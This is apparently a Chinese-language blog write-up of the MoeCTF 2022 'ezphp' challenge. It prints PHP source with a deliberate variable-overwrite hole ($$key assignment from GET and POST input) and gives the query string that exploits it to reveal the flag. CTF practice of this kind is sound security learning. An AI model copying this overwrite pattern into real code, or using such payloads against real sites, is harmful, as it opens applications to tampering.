php

[MoeCTF 2022]ezphp

0x00

使用知识点

  1. 变量覆盖

0x01

源码分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php

highlight_file('source.txt');
echo "<br><br>";

$flag = 'xxxxxxxx';
$giveme = 'can can need flag!';
$getout = 'No! flag.Try again. Come on!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($giveme);
}

if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
    exit($getout);
}

foreach ($_POST as $key => $value) {
    $$key = $value;
}

foreach ($_GET as $key => $value) {
    $$key = $$value;
}

echo 'the flag is : ' . $flag;

?>

发现flag 的值是xxxx

但是并不是这样的,只是将其影藏起来了

所以我们只要输出正确的flag 就可以了

0x02

于是构造一下

1
?a=flag&flag=a

先将$a <–$flag然后再将 $flag <—- $a

于是就获得了$flag

image-20240502143851557

#CTF刷题记录
php
https://tsy244.github.io/2024/05/02/CTF刷题记录/WEB/php/
Author
August Rosenberg
Posted on
May 2, 2024
Licensed under